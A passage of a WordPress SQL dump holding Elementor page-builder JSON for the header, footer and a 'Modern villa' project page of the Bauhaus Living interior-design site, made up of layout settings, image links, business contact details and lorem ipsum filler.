fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#02010100\",\"icon_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_secondary_color\":\"#E3B25A\",\"ova_social_icons_display\":\"inline-flex\",\"_element_width\":\"auto\",\"icon_secondary_color\":\"#808080\"},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":false},{\"id\":\"0cbe6bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.332,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":5},\"elements\":[{\"id\":\"02a8f8b\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#808080\",\"link_color_hover\":\"#FFFFFF\",\"link_color_active\":\"#FFFFFF\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"20\",\"bottom\":\"5\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":false},{\"id\":\"64a01ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":45,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":65},\"elements\":[{\"id\":\"331f18a\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"size_icon\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"2a1ae6f\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":false}],\"isInner\":false}]'),(680,78,'_elementor_page_assets','a:0:{}'),(682,103,'_wp_page_template','default'),(683,103,'hf_options','footer'),(684,103,'_elementor_edit_mode','builder'),(685,103,'_elementor_template_type','wp-post'),(686,103,'_elementor_version','3.8.1'),(687,103,'_elementor_data','[{\"id\":\"ef331a9\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/lines.png\",\"id\":139,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"initial\",\"background_overlay_xpos\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"%\",\"size\":135,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"%\",\"size\":145,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"%\",\"size\":-450,\"sizes\":[]},\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"auto\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.04,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_position_mobile\":\"initial\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"7d36326\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":58.992,\"content_position\":\"top\",\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"120\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bce0c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Le\'t turn your ideas into reality\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e5254c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[mc4wp_form id=\\\"107\\\"]\",\"_css_classes\":\"mc4wp-style-1\"},\"elements\":[],\"widgetType\":\"shortcode\"},{\"id\":\"4631f27\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"layout\":\"full_width\",\"content_position\":\"middle\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"88bc706\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"626a216\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"3710ec8\",\"phone_label\":\"021 22544768\",\"phone_address\":\"021 22544768\"}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"auto\",\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"0caec2f\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"3710ec8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\"}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"info_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":true},{\"id\":\"d70c8a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":100,\"align_tablet\":\"flex-start\"},\"elements\":[{\"id\":\"d12cde8\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"_id\":\"96cddfe\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/bauhausliving\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#1D1D1D\",\"icon_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"ova_social_icons_display\":\"inline-flex\",\"_element_width\":\"auto\",\"icon_padding\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_element_vertical_align\":\"center\",\"hover_primary_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"5931fd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.68,\"content_position\":\"top\",\"align\":\"flex-start\",\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":25,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"077\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"78\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02b9056\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9ce475a\",\"elType\":\"widget\",\"settings\":{\"menu_slug\":\"menu-explore\",\"menu_color_normal\":\"#808080\",\"text_typography_typography\":\"custom\",\"text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"menu_color_hover\":\"#E3B25A\",\"sub_menu_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_footer\"}],\"isInner\":false},{\"id\":\"18d6727\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.289,\"content_position\":\"top\",\"align\":\"flex-start\",\"background_background\":\"classic\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-footer-right.png\",\"id\":145,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"css_classes\":\"retirio_stretch_column_right\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.12,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":25,\"background_overlay_position_tablet\":\"initial\",\"background_overlay_xpos_tablet\":{\"unit\":\"%\",\"size\":-150,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"%\",\"size\":-150,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_overlay_size_tablet\":\"contain\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a3214d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6b9862e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"3710ec8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":\"on\",\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#808080\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"info_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"initial\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":191},\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f3df713\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#1D1D1D\",\"padding\":{\"unit\":\"px\",\"top\":\"21\",\"right\":\"10\",\"bottom\":\"25\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"5aa0f63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ebc849a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2023 bauhaus living, develop by <a href=\\\"http:\\/\\/www.futuremediatrix.com\\\">futuremediatrix.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#808080\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(688,103,'_elementor_page_assets','a:0:{}'),(689,169,'_wp_page_template','default'),(690,169,'hf_options','header'),(691,169,'_elementor_edit_mode','builder'),(692,169,'_elementor_template_type','wp-post'),(693,169,'_elementor_version','3.8.1'),(694,169,'_elementor_data','[{\"id\":\"4b8ed48\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-header-banner-50.jpg\",\"id\":176,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.15,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b854cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"331f515\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"background_color\":\"#8B8B8B\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\"},\"elements\":[{\"id\":\"04f5e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":55,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"9976ebd\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":true},{\"id\":\"a3d2548\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.333,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"83a8e7e\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":true},{\"id\":\"42f189e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":40,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"dab1acf\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"hide_mobile\":\"hidden-mobile\",\"size_icon\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"74985dd\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"22c2d59\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#30302F\",\"padding\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"0135\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"90db396\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1b126a7\",\"elType\":\"widget\",\"settings\":{\"header_boxed_content\":\"\",\"cover_color\":\"#8F363600\",\"title_color\":\"#FFFFFF\",\"breadcrumbs_color\":\"#FFFFFF\",\"breadcrumbs_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_header_banner\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(695,169,'_elementor_page_assets','a:0:{}'),(697,613,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(698,613,'ova_project_service','Interior design'),(699,613,'ova_project_architect','Mike hardson'),(700,613,'ova_project_duration','4.5 Months'),(701,613,'ova_project_location','Broklyn, New York'),(702,613,'_elementor_edit_mode','builder'),(703,613,'_elementor_template_type','wp-post'),(704,613,'_elementor_version','3.6.6'),(705,613,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:85:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/modern-villa/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:92:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/modern-villa/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:100:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/modern-villa/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:86:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/modern-villa/\";}}'),(706,613,'_wp_page_template','default'),(707,613,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Modern villa\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas 